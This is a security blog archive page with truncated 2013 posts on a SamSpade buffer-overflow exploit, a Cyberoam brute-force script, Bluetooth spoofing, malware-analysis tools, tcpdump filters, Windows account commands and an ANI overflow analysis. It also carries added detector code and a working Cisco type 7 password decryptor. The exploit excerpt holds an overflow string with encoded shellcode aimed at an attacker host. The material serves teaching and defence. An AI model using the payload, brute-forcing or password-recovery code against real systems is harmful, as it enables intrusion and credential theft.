
Showing posts from 2013

SAMSPADE BUFFER OVERFLOW VULNERABILITY

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW
# Date: 10-12-2013
# Exploit Author: VISHAL MISHRA & NIDHI VERMA
# Vendor Homepage: http://www.samspade.org/
# Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html
# Version: 1.1.4 (beta)
# Tested on: WINDOWS XP(sp2)

TARGET: windows xp(sp2) ip:192.168.117.129
ATTACKER: backtrack ip:192.168.117.131 PORT:443

Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhMYGpGpEPQpMYM5EaXRE4LKRrP0LKRrVl…

Spoofing Bluetooth Device Information

Step1: $hciconfig
Like ifconfig for wired and iwconfig for wireless interfaces, hciconfig enumerates the Bluetooth interfaces in a system and prints basic information about each adapter: its MAC address (BD_ADDR), MTU and interface name.




Step2:$hciconfig -a hci0
So now we know we have a Bluetooth interface hci0 (it may be hci0, hci1, etc.). As you can see in the output below, this Bluetooth device uses the OS hostname as its own device name. We will change this information so that nobody can learn anything about our machine by enumerating our Bluetooth device.
Class (Class of Device) is a 24-bit identifier, written as 6 hex digits, that tells other devices which hardware class a Bluetooth device belongs to, e.g.
1) 0x78020c is the class of a Phone/Smartphone,
2) 0x6e0100 is the class of a Computer, etc.
Now we will try to change the default class and name of our Bluetooth device.



Step3:$hciconfig -a hci0 features
This command lists the features our adapter supports.



Step4: $hciconfig -a hci0 name 'aLt' class 0x…

OfficeMalScanner Tutorial

+------------------------------------------+
|           OfficeMalScanner v0.61         |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+
Usage:
--------
OfficeMalScanner <PPT, DOC or XLS file> <scan | info | inflate> <brute> <debug>

Options:
scan    - scan for several shellcode heuristics and encrypted PE-Files
info    - dumps OLE structures, offsets+length and saves found VB-Macro code
inflate - decompresses MS Office 2007 documents, e.g. docx, into a temp dir
Switches: (only enabled if option "scan" was selected)
brute   - enables the "brute force mode" to find encrypted stuff
debug   - prints out disassembly or hex output if a heuristic was found

If you use Ubuntu with Wine installed, run "wine cmd.exe" in a terminal to get a Windows command prompt from which you can run OfficeMalScanner.
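To make the "scan" and "brute" options less of a black box, here is an added example of the two techniques they stand for, written by me and not OfficeMalScanner's own code: a search for a few byte sequences typical of x86 shellcode (the pattern list is my own selection, not the tool's exact heuristic set) and a single-byte XOR brute force that looks for an embedded PE file. The sample document it scans is constructed inline and is not a real malicious file.

```python
# Added example (mine, not OfficeMalScanner's code): the kind of byte-level
# heuristics the "scan" option looks for, plus a single-byte XOR search in the
# spirit of "brute". The pattern set below is my own selection.
HEURISTICS = {
    "GetEIP (call $+5)":                  b"\xe8\x00\x00\x00\x00",
    "PEB access (mov eax, fs:[30h])":     b"\x64\xa1\x30\x00\x00\x00",
    "PEB access (mov eax, fs:[eax+30h])": b"\x64\x8b\x40\x30",
    "SEH head (mov eax, fs:[0])":         b"\x64\xa1\x00\x00\x00\x00",
}


def find_all(data, pattern):
    """Yield every offset at which pattern occurs in data."""
    pos = data.find(pattern)
    while pos != -1:
        yield pos
        pos = data.find(pattern, pos + 1)


def find_pe(data):
    """Offsets of 'MZ' headers whose e_lfanew points at a 'PE\\0\\0' signature."""
    hits = []
    for pos in find_all(data, b"MZ"):
        if pos + 0x40 > len(data):
            continue
        e_lfanew = int.from_bytes(data[pos + 0x3C:pos + 0x40], "little")
        sig = pos + e_lfanew
        if 0x40 <= e_lfanew < 0x1000 and data[sig:sig + 4] == b"PE\x00\x00":
            hits.append(pos)
    return hits


def scan(data):
    """Plain-text heuristics: (offset, description) pairs, sorted by offset."""
    hits = [(off, name) for name, pattern in HEURISTICS.items()
            for off in find_all(data, pattern)]
    hits += [(off, "embedded PE file") for off in find_pe(data)]
    return sorted(hits)


def brute_xor(data):
    """Try every single-byte XOR key; report (key, offset) of PE files that appear."""
    found = []
    for key in range(1, 256):
        table = bytes(i ^ key for i in range(256))
        for off in find_pe(data.translate(table)):
            found.append((key, off))
    return found


def build_sample():
    """Constructed test document: NOP sled, a GetEIP stub, then a minimal fake
    PE header XORed with 0x5A. Not a real malicious file."""
    pe = bytearray(b"MZ" + b"\x00" * 0x3A)
    pe += (0x40).to_bytes(4, "little")            # e_lfanew -> PE signature
    pe += b"PE\x00\x00" + b"\x00" * 60
    encoded = bytes(pe.translate(bytes(i ^ 0x5A for i in range(256))))
    return (b"\x90" * 16 + b"\xe8\x00\x00\x00\x00\x5b"
            + b"A" * 40 + encoded + b"B" * 20)


if __name__ == "__main__":
    doc = build_sample()
    for off, what in scan(doc):
        print("0x%06x  %s" % (off, what))
    for key, off in brute_xor(doc):
        print("XOR key 0x%02x: PE file at 0x%06x" % (key, off))
```

The plain scan only sees the GetEIP stub; the embedded executable is invisible until brute_xor tries the right key, which is exactly why the tool keeps brute force as a separate, slower switch. A real scanner also has to consider multi-byte keys and ADD/ROL encodings, which this example does not.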


OfficeMalScanner Output



Jsunpack-n Tutorial (Analyzing Malicious Documents)

INSTALLATION:

Required dependencies (all of them ship inside the jsunpack-n package, in a folder named depends):
1) Build and install pynids (libnids bindings) from ./depends/pynids-0.6.1.tar.gz
To compile pynids you may need the following (Ubuntu) packages:
libpcap-dev pkg-config python-dev libgtk2.0-dev libnet1-dev
To install these packages either use the Software Center or run apt-get install <PackageName>

    $ cd depends
    $ tar xvfz pynids-0.6.1.tar.gz
    $ cd pynids-0.6.1/
    $ python setup.py build
    $ sudo python setup.py install

2) Build SpiderMonkey 'js' from ./depends/js-1.8.0-rc1-src.tar.gz

    This package carries modifications to the SpiderMonkey source code; therefore it is not recommended to use the default smjs packages. (Details of the modifications are in INSTALL.spidermonkey.shellcode and INSTALL.spidermonkey, kept for historical purposes.)

    $ cd depends/
    $ tar xvfz js-1.8.0-rc1-src.tar.gz
    $ cd js-1.8.0-rc1-src
    $ make BUILD_OPT=1 -f Makefile.ref
    The…

Cyberoam Login Brute Force Script

#
#  ('-.               .-') _                         ) (`-.               _  .-')
#  ( OO ).-.          (  OO) )                         ( OO ).            ( \( -O )
#  / . --. / ,--.     /     '._     ,------.,--. ,--. (_/.  \_)-.  .----.  ,------.
#  | \-.  \  |  |.-') |'--...__) ('-| _.---'|  | |  |  \  `.'  /  /  ..  \ |   /`. '
#.-'-'  |  | |  | OO )'--.  .--' (OO|(_\    |  | | .-') \     /\ .  /  \  .|  /  | |
# \| |_.'  | |  |`-' |   |  |    /  |  '--. |  |_|( OO ) \   \ | |  |  '  ||  |_.' |
#  |  .-.  |(|  '---.'   |  |    \_)|  .--' |  | | `-' /.'    \_)'  \  /  '|  .  '.'
#  |  | |  | |      |    |  |      \|  |_) ('  '-'(_.-'/  .'.  \  \  `'  / |  |\  \
#  `--' `--' `------'    `--'       `--'     `-----'  '--'   '--'  `---''  `--' '--'
# Cyberoam brute force script
# @aut…

Capture Wireless Traffic

Using Tcpdump

tcpdump -i <interface> -s 0 -nne 'wlan type <type> subtype <subtype>'

Note: older versions of tcpdump and Wireshark capture filters don't support the "wlan" keyword; just use 'type <type> subtype <subtype>'.

Sniffing wireless in monitor mode, ignoring beacons:
tcpdump -i <interface> -s 0 -nne '(type mgt or type ctl or type data) and (not type mgt subtype beacon)'

Valid type/subtype combinations:
type    subtype
mgt     assoc-req, assoc-resp, reassoc-req, reassoc-resp, probe-req, probe-resp, beacon, atim, disassoc, auth, deauth
ctl     ps-poll, rts, cts, ack, cf-end, cf-end-ack
data    data, data-cf-ack, data-cf-poll, data-cf-ack-poll, null, cf-ack, cf-poll, cf-ack-poll, qos-data, qos-data-cf-ack, qos-data-cf-poll, qos-data-cf-ack-poll, qos, qos-cf-poll, qos-cf-ack-poll

Using Wireshark wlan.fc.type == 0 Manageme

Microsoft Windows 2000 IIS 5.0 IPP Vulnerability

Exploit Microsoft Windows 2000 IIS 5.0 IPP ISAPI Vulnerability


Install And Configure Yara

Step1: To install YARA on Ubuntu we need PCRE and its development headers first:
sudo apt-get install libpcre3 libpcre3-dev
Then download and unpack the YARA source code:
$ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz
$ wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz
$ tar xzf yara-1.4.tar.gz && tar xzf yara-python-1.4.tar.gz


Step2: Compile and install yara on your Linux box.
a) cd yara-1.4
   chmod +x -R /root/Desktop/yara-1.4/*
   ./configure
   make
   make check
   make install

b) cd ..
   cd yara-python-1.4
   python setup.py install




Step 3: Convert the ClamAV database to YARA rules with clamav_to_yara.py from the malwarecookbook project:
http://code.google.com/p/malwarecookbook/source/browse/trunk/3/3/clamav_to_yara.py?r=5

sigtool -u /var/lib/clamav/main.cvd                    # decompress the database (produces main.ndb among other files)
python clamav_to_yara.py -f main.ndb -o clamav.yara    # convert the .ndb body signatures to YARA

Step 4: For packer signatures (PEiD uses these signatures to detect the packer), go to this site and copy the packer signatures into a file. Now with the help of this file we can detect p…
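Step 3 hides the interesting part: a ClamAV .ndb body signature and a YARA hex string express almost the same thing, but not quite, and a converter has to know which tokens map and which do not. The following is an added example of that mapping, written by me and not the malwarecookbook script; the .ndb lines it converts are constructed for illustration and are not real ClamAV signatures. It assumes a YARA version that accepts unbounded jumps ([-], [n-]), i.e. 2.0 or newer.

```python
import re

# Added example (mine, not the malwarecookbook script): convert ClamAV .ndb
# body signatures into YARA rules. An .ndb line is
#   MalwareName:TargetType:Offset:HexSignature[:MinFL[:MaxFL]]
# and the hex signature may contain ??, nibble wildcards (a?), {n}, {n-m},
# {-n}, {n-}, * and (aa|bb) alternatives. Boundary/negation tokens such as
# (B), (L), (W) and ! have no YARA equivalent and make the line get skipped.
# Unbounded jumps ([-], [n-]) need YARA 2.0 or newer.

TARGET_CONDITIONS = {
    "1": "uint16(0) == 0x5A4D",       # ClamAV target 1: PE file
    "2": "uint32(0) == 0xE011CFD0",   # ClamAV target 2: OLE2 container
}

HEX_PAIR = re.compile(r"[0-9a-fA-F?]{2}")


def _spaced(hexbytes):
    return " ".join(hexbytes[i:i + 2].upper() for i in range(0, len(hexbytes), 2))


def clamav_hex_to_yara(sig):
    """Translate one ClamAV hex signature into a list of YARA hex-string tokens."""
    tokens, i = [], 0
    while i < len(sig):
        c = sig[i]
        if c == "*":                                  # any number of bytes
            tokens.append("[-]")
            i += 1
        elif c == "{":                                # {n}, {n-m}, {-n}, {n-}
            j = sig.index("}", i)
            body = sig[i + 1:j]
            if not re.fullmatch(r"\d+|\d+-\d*|-\d+", body):
                raise ValueError("unsupported jump {%s}" % body)
            tokens.append("[0%s]" % body if body.startswith("-") else "[%s]" % body)
            i = j + 1
        elif c == "(":                                # (aa|bb) alternatives only
            j = sig.index(")", i)
            alts = sig[i + 1:j].split("|")
            if not all(re.fullmatch(r"(?:[0-9a-fA-F?]{2})+", a) for a in alts):
                raise ValueError("unsupported alternative (%s)" % sig[i + 1:j])
            tokens.append("( " + " | ".join(_spaced(a) for a in alts) + " )")
            i = j + 1
        elif HEX_PAIR.fullmatch(sig, i, i + 2):       # plain byte or ?? wildcard
            tokens.append(sig[i:i + 2].upper())
            i += 2
        else:
            raise ValueError("unsupported token at %d: %r" % (i, sig[i:i + 4]))
    # YARA does not allow a hex string to start or end with a jump.
    while tokens and tokens[0].startswith("["):
        tokens.pop(0)
    while tokens and tokens[-1].startswith("["):
        tokens.pop()
    if not tokens:
        raise ValueError("empty signature")
    return tokens


def ndb_to_yara(line):
    """Return one YARA rule (as text) for an .ndb line; ValueError when the
    signature uses features YARA cannot express."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError("not an .ndb line: %r" % line)
    name, target, offset, hexsig = fields[:4]
    rule_name = re.sub(r"\W", "_", name)
    if not rule_name or rule_name[0].isdigit():
        rule_name = "_" + rule_name
    conditions = []
    if target in TARGET_CONDITIONS:
        conditions.append(TARGET_CONDITIONS[target])
    conditions.append("$a at %s" % offset if offset.isdigit() else "$a")
    return ("rule %s\n{\n"
            "    meta:\n        clamav_name = \"%s\"\n        clamav_target = \"%s\"\n"
            "    strings:\n        $a = { %s }\n"
            "    condition:\n        %s\n}\n"
            % (rule_name, name, target, " ".join(clamav_hex_to_yara(hexsig)),
               " and ".join(conditions)))


def convert_ndb(text):
    """Convert a whole .ndb file: returns (rules text, [(name, reason)] skipped)."""
    rules, skipped = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        try:
            rules.append(ndb_to_yara(line))
        except ValueError as err:
            skipped.append((line.split(":")[0], str(err)))
    return "\n".join(rules), skipped


# Constructed sample lines in .ndb syntax (not real ClamAV signatures).
SAMPLE_NDB = """\
Test.Dropper-1:1:*:4d5a{2-4}50450000??e8(0102|03)
Test.Macro.A:2:512:41757446{-8}4f70656e
Test.Star:0:*:aabb*ccdd
Test.Boundary:0:*:aa(B)bb
"""

if __name__ == "__main__":
    rules, skipped = convert_ndb(SAMPLE_NDB)
    print(rules)
    for name, why in skipped:
        print("# skipped %s: %s" % (name, why))
```

Skipped lines are reported rather than silently dropped, because a converter that quietly loses signatures gives you a rule set that looks complete and is not; the target-type conditions are added so a PE-only ClamAV signature does not start firing on arbitrary files once it lives in YARA.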

Clamav Tutorial

Install ClamAV And Create Signatures

Step1: Install clamav on Ubuntu by following the simple steps given below:
Edit /etc/apt/sources.list and add a line like this to it:
deb http://volatile.debian.org/debian-volatile lenny/volatile main contrib non-free
Then run apt-get update && apt-get install clamav
If you need clamd, you may also want to run apt-get install clamav-daemon

Step2: CVD (ClamAV Virus Database) is a digitally signed container that includes signature databases in various text formats. The header of the container is a 512-byte string with colon-separated fields:
ClamAV-VDB:build time:version:number of signatures:functionality level required:MD5 checksum:digital signature:builder name:build time (sec)
sigtool --info displays detailed information about a given CVD file.

Signature formats:
MD5: The easiest way to create signatures for ClamAV is to use MD5 checksums; however, this method can only be used against static malware, since changing a single byte of the file changes the hash.
MD5, PE section based: You can create a MD5 signat…
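As an added example (my own code, not ClamAV's), the following reads the 512-byte CVD header described in Step 2 and produces and checks the MD5 (.hdb) signature format the text calls the easiest one. The header bytes are constructed for illustration with invented values in the documented layout, and the "malware sample" is a short constructed byte string; the .hdb line format MD5:FileSize:MalwareName is ClamAV's.

```python
import hashlib

# Added example (mine, not ClamAV code): read the 512-byte CVD header the
# tutorial describes, and create/verify the MD5 (.hdb) signatures it calls the
# easiest format. An .hdb line is  MD5:FileSize:MalwareName.

CVD_FIELDS = ("magic", "build_time", "version", "signatures",
              "functionality_level", "md5", "digital_signature",
              "builder", "build_time_sec")


def parse_cvd_header(header):
    """Parse the colon-separated 512-byte CVD header into a dict."""
    if len(header) != 512:
        raise ValueError("CVD header is exactly 512 bytes")
    fields = header.rstrip(b" \x00").decode("ascii").split(":")
    if len(fields) != len(CVD_FIELDS) or fields[0] != "ClamAV-VDB":
        raise ValueError("not a CVD header")
    info = dict(zip(CVD_FIELDS, fields))
    for key in ("version", "signatures", "functionality_level", "build_time_sec"):
        info[key] = int(info[key])
    return info


def hdb_line(sample, name):
    """Produce the .hdb signature line for the bytes of a sample."""
    return "%s:%d:%s" % (hashlib.md5(sample).hexdigest(), len(sample), name)


def hdb_match(sample, hdb_text):
    """Names of .hdb signatures matching the sample; the size is compared
    first so the hash is only computed for candidates of the right length."""
    names = []
    digest = None
    for line in hdb_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        md5hex, size, name = line.split(":", 2)
        if int(size) != len(sample):
            continue
        if digest is None:
            digest = hashlib.md5(sample).hexdigest()
        if digest == md5hex:
            names.append(name)
    return names


# Constructed header: invented values, documented layout, space-padded to 512.
SAMPLE_HEADER = (b"ClamAV-VDB:01 Jan 2013 12-00 +0000:54:1044387:60:"
                 b"d41d8cd98f00b204e9800998ecf8427e:deadbeef:neo:1356998400"
                 ).ljust(512, b" ")

if __name__ == "__main__":
    info = parse_cvd_header(SAMPLE_HEADER)
    print("version %d, %d signatures, needs functionality level %d, built by %s"
          % (info["version"], info["signatures"],
             info["functionality_level"], info["builder"]))
    sample = b"hello"                       # constructed stand-in for a malware file
    sig = hdb_line(sample, "Test.Hello")
    print(sig)
    print(hdb_match(sample, sig))           # the original file matches
    print(hdb_match(sample + b"!", sig))    # one byte appended and it no longer does
```

The last two lines are the "static malware only" caveat in action: the signature is exact, so a repacked or trivially patched variant needs a new hash, which is why body signatures (.ndb) and PE-section hashes exist.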

TcpDumpTutorial

When using a tool that displays network traffic in a more natural (raw) way, the burden of analysis is placed directly on the human rather than on the application. This approach cultivates a continued and deeper understanding of the TCP/IP suite, and for this reason I strongly advocate using tcpdump instead of other tools whenever possible.

A mnemonic for the TCP flags, in the order of their bits in byte 13 of the TCP header (URG=32, ACK=16, PSH=8, RST=4, SYN=2, FIN=1): Unskilled Attackers Pester Real Security Folk.

Show me all URGENT (URG) packets... # tcpdump 'tcp[13] & 32 != 0'
Show me all ACKNOWLEDGE (ACK) packets... # tcpdump 'tcp[13] & 16 != 0'
Show me all PUSH (PSH) packets... # tcpdump 'tcp[13] & 8 != 0'
Show me all RESET (RST) packets... # tcpdump 'tcp[13] & 4 != 0'
Show me all SYNCHRONIZE (SYN) packets... # tcpdump 'tcp[13] & 2 != 0'
Show me all FINISH (FIN) packets... # tcpdump 'tcp[13] & 1 != 0'
Show me all SYNCHRONIZE/ACKNOWLEDGE (SYN/ACK) packets... # tcpdump 'tcp[13] = 18'
[ Note: Only the PSH, RST, SYN, and FIN flags are displayed in…
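The filters above all index the same byte, and the difference between "& N != 0" and "= N" matters more than it looks. The following added example (my own code, not part of the tutorial) shows where tcp[13] sits in a packet, generates the three useful forms of the flag test, and evaluates them on constructed IPv4/TCP packets, including the case the exact form misses: a SYN/ACK with the ECE bit set during ECN negotiation.

```python
import struct

# Added example (mine, not from the tutorial): what "tcp[13]" indexes and the
# three ways to test it. Byte 13 of the TCP header holds the flag bits:
#   CWR=128 ECE=64 URG=32 ACK=16 PSH=8 RST=4 SYN=2 FIN=1
# tcpdump's "tcp[13] = 18" only matches SYN/ACK when no other bit is set;
# a SYN/ACK with ECE (ECN negotiation) is 0x52 and slips through it.

TCP_FLAGS = {"CWR": 0x80, "ECE": 0x40, "URG": 0x20, "ACK": 0x10,
             "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}


def _mask(names):
    mask = 0
    for n in names:
        mask |= TCP_FLAGS[n.upper()]
    return mask


def bpf_for_flags(names, mode="any"):
    """tcpdump expression for the named flags.
    any:   at least one of them set          -> tcp[13] & m != 0
    all:   every one set, others don't care  -> tcp[13] & m = m
    exact: exactly these and nothing else    -> tcp[13] = m  (the tutorial's SYN/ACK form)"""
    mask = _mask(names)
    if mode == "any":
        return "tcp[13] & %d != 0" % mask
    if mode == "all":
        return "tcp[13] & %d = %d" % (mask, mask)
    if mode == "exact":
        return "tcp[13] = %d" % mask
    raise ValueError("unknown mode %r" % mode)


def build_ipv4_tcp(flags, sport=40000, dport=80):
    """Constructed packet: minimal IPv4 header + 20-byte TCP header, no payload."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    return ip + tcp


def tcp_flag_byte(packet):
    """tcp[13]: byte 13 counted from the start of the TCP header, which begins
    right after the IPv4 header (IHL * 4 bytes, so options are handled)."""
    ihl = (packet[0] & 0x0F) * 4
    return packet[ihl + 13]


def flag_names(flags):
    return [n for n, bit in TCP_FLAGS.items() if flags & bit]


def matches(packet, names, mode="any"):
    """Evaluate in Python the same test bpf_for_flags expresses for tcpdump."""
    mask, value = _mask(names), tcp_flag_byte(packet)
    return {"any": value & mask != 0,
            "all": value & mask == mask,
            "exact": value == mask}[mode]


if __name__ == "__main__":
    for names, mode in ((["URG"], "any"), (["SYN"], "any"),
                        (["SYN", "ACK"], "exact"), (["SYN", "ACK"], "all")):
        print("%-14s %-6s -> %s" % ("/".join(names), mode, bpf_for_flags(names, mode)))
    synack, synack_ecn = build_ipv4_tcp(0x12), build_ipv4_tcp(0x52)
    print(flag_names(tcp_flag_byte(synack_ecn)))
    print("exact:", matches(synack, ["SYN", "ACK"], "exact"),
          matches(synack_ecn, ["SYN", "ACK"], "exact"))
    print("all:  ", matches(synack, ["SYN", "ACK"], "all"),
          matches(synack_ecn, ["SYN", "ACK"], "all"))
```

For handshake hunting, 'tcp[13] & 18 = 18' is the safer filter; reserve the exact form for when you really want to exclude the ECN bits. Newer libpcap also accepts the symbolic form 'tcp[tcpflags] & (tcp-syn|tcp-ack) != 0', which reads better in saved filter sets.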

Rare Window Commands

1) Find the MAC address of all available interfaces:
    getmac

2) Find the Windows OS version:
    ver

3) Find your own SID (another method):
    whoami /user

4) Find system information:
    systeminfo

5) Find the SID of a Windows user:
    wmic useraccount where name='vishal' get sid

6) Find the wireless adapters and the access points available around you:
    netsh wlan show all

Different types of Cisco IOS passwords

There are three different types of Cisco IOS passwords.

1) Cisco IOS type 0 passwords
There is a command in Cisco IOS that encrypts all passwords in the configuration file. If this command has not been entered, all passwords (except the enable secret password) appear in plaintext, as shown below:
username admin privilege 15 password 0 cisco
From the above line in the Cisco IOS configuration file we can see that the user admin has the password cisco. Such passwords are noted as type 0 (zero), as shown by the zero that precedes the actual password. Type 0 passwords use no encryption.

2) Cisco IOS type 7 passwords
The command that encrypts user passwords is "service password-encryption", entered from the router's global configuration mode. Once it is issued, all type 0 (zero) passwords in the configuration become type 7. Note that type 7 is a reversible obfuscation rather than real encryption: anyone who can read the configuration can recover the plaintext instantly, so it only protects against someone glancing at the screen.
 username…
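To make the type 7 caveat concrete, here is an added example (my own code, not from the post) implementing the well-known reversible scheme: the first two characters are a decimal seed, and each following hex pair is one plaintext character XORed with a byte of a fixed key table starting at that seed. The configuration excerpt it scans is constructed and does not come from a real device; the recovered passwords are the classic test value "cisco".

```python
import re

# Added example (mine, not from the post): the well-known reversible scheme
# behind Cisco IOS type 7 passwords. The first two characters are a decimal
# seed, every following hex pair is one character XORed with a byte of a fixed
# key table, starting at the seed.

XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decrypt(encoded):
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("malformed type 7 string: %r" % encoded)
    seed = int(encoded[:2])
    plain = bytearray()
    for i, pos in enumerate(range(2, len(encoded), 2)):
        plain.append(int(encoded[pos:pos + 2], 16) ^ XLAT[(seed + i) % len(XLAT)])
    return plain.decode("latin-1")


def type7_encrypt(plain, seed=7):
    """Inverse of type7_decrypt; IOS picks a random seed in 0..15."""
    if not 0 <= seed <= 15:
        raise ValueError("IOS uses seeds 0..15")
    return "%02d" % seed + "".join(
        "%02X" % (ord(c) ^ XLAT[(seed + i) % len(XLAT)]) for i, c in enumerate(plain))


# Matches "password 7 <hex>", "secret 7 <hex>" and "key 7 <hex>" lines.
TYPE7_RE = re.compile(r"^(.*\b(?:password|secret|key)\s+7\s+)([0-9A-Fa-f]+)[ \t]*$", re.M)


def recover_type7(config_text):
    """Return (config line, recovered plaintext) for every type 7 value found."""
    return [(m.group(0).strip(), type7_decrypt(m.group(2)))
            for m in TYPE7_RE.finditer(config_text)]


# Constructed configuration excerpt (not from a real device).
SAMPLE_CONFIG = """\
service password-encryption
username admin privilege 15 password 7 070C285F4D06
enable secret 5 $1$abcd$NotReversibleHash/
line vty 0 4
 password 7 0822455D0A16
"""

if __name__ == "__main__":
    for line, pw in recover_type7(SAMPLE_CONFIG):
        print("%-55s -> %s" % (line, pw))
    print(type7_encrypt("cisco", seed=7))
```

Both type 7 strings in the sample decode to "cisco" even though they look different, because only the seed changed. The enable secret line is left alone: type 5 is a salted MD5 hash and is not reversible, which is why the post's type 0 section singles it out.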

Manage User Account In Command Prompt

1) Command to list the user accounts on a Windows box:
    net user
2) Command to add a new user account with a password (here user Lenny, password mango):
    net user Lenny mango /add
3) Command to add a user account to the local Administrators group:
    net localgroup Administrators Lenny /add
4) To share a folder and grant a user full permissions on that share (this sets share permissions only; administrator rights come from step 3):
    net share sharename=C:\path /grant:useraccountname,full
5) The following example adds a user account for a user whose full name is Jay Jamison and whose user account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B), and the user's full name:
    net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay Jamison"

6) The following example sets the logon time (8 A.M. to 5 P.M.) for Lenny by using 24-hour notation:
    net user Lenny /times:M-F,08:00-17:00
7) The following example sets the logon time (8 A.M. to 5 P.M.) for Lenny by us…

Animated Cursor Vulnerability Demystified

Even with GS, DEP, ASLR and Protected Mode IE7 in place, it is possible to write a functional proof of concept that works on Vista as well as on XP. When the vulnerability is triggered on Vista with a complete overwrite of the return address, the register state looks something like this:

eax=5f36476f ebx=0329f278 ecx=00000000 edx=00000000 esi=0329f1f0 edi=0329f1bc
eip=41414141 esp=0329f1bc ebp=66ae6c41 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
41414141 ?? ???

One important point is that the malicious ANI file contains two anih headers: a good one of 36 bytes and a second, bad one that causes the buffer overflow in the LoadAniIcon function. The first header is 36 bytes so that the file passes the size check in LoadCursorIconFromFileMap, but that check is performed only once per file; when another anih header is encountered, LoadCursorIconFromFileMap is not called again and the chunk is handed to LoadAniIcon instead…
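The two-header trick described above is also what makes malicious ANI files easy to spot in bulk: a well-formed cursor has exactly one anih chunk and it is exactly 36 bytes. The following is an added example (my own code, not part of the original write-up) that walks the RIFF chunk structure of an ACON file, including anih chunks nested inside LIST chunks, and reports the two anomalies. The benign and malicious files it inspects are constructed inline with the described layout and carry no exploit code.

```python
import struct

# Added example (mine, not from the write-up): flag ANI files that carry more
# than one anih chunk, or an anih chunk whose declared length is not 36.

ANIH_SIZE = 36  # sizeof(ANIHEADER), the size LoadCursorIconFromFileMap expects


def chunk(fourcc, body):
    """RIFF chunk: fourcc, little-endian length, body padded to an even size."""
    return fourcc + struct.pack("<I", len(body)) + body + (b"\x00" if len(body) & 1 else b"")


def riff_acon(chunks):
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


def anih(declared_size=ANIH_SIZE):
    """An anih chunk; any size other than 36 reproduces the malicious shape."""
    # ANIHEADER: cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
    header = struct.pack("<9I", ANIH_SIZE, 1, 1, 0, 0, 0, 0, 1, 1)
    body = header[:declared_size] if declared_size <= ANIH_SIZE else header.ljust(declared_size, b"A")
    return chunk(b"anih", body)


def iter_chunks(data, start, end):
    """Yield (fourcc, declared size, body start, body end) for chunks in [start, end)."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        body_start = pos + 8
        yield fourcc, size, body_start, min(body_start + size, end)  # tolerate bad lengths
        pos = body_start + size + (size & 1)


def find_anih_chunks(data):
    """[(chunk offset, declared size)] for every anih chunk, LIST children included."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        raise ValueError("not a RIFF ACON file")
    found = []

    def walk(start, end):
        for fourcc, size, bstart, bend in iter_chunks(data, start, end):
            if fourcc == b"anih":
                found.append((bstart - 8, size))
            elif fourcc == b"LIST":
                walk(bstart + 4, bend)      # skip the list type, e.g. 'fram'

    walk(12, min(len(data), 8 + struct.unpack_from("<I", data, 4)[0]))
    return found


def is_suspicious(data):
    """Human-readable reasons; an empty list means the file looks well-formed."""
    chunks = find_anih_chunks(data)
    reasons = []
    if len(chunks) > 1:
        reasons.append("%d anih chunks (expected 1)" % len(chunks))
    for off, size in chunks:
        if size != ANIH_SIZE:
            reasons.append("anih at 0x%x declares %d bytes, expected 36" % (off, size))
    return reasons


# Constructed files: a benign cursor and one with the second, oversized anih.
FRAMES = chunk(b"LIST", b"fram" + chunk(b"icon", b"\x00" * 16))
BENIGN = riff_acon([anih(), FRAMES])
MALICIOUS = riff_acon([anih(), FRAMES, anih(100)])

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, find_anih_chunks(blob), is_suspicious(blob) or "ok")
```

The walker clamps each chunk body to the enclosing region rather than trusting the declared length, so a crafted size that points past the end of the file is reported instead of crashing the checker, which is the same trust-the-length mistake the vulnerable loader made.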

Simple Bash Scripting

Harvesting
Step 1: Download the default page of a website:
wget icq.com
Step 2: Find all FQDNs and PQDNs in index.html:
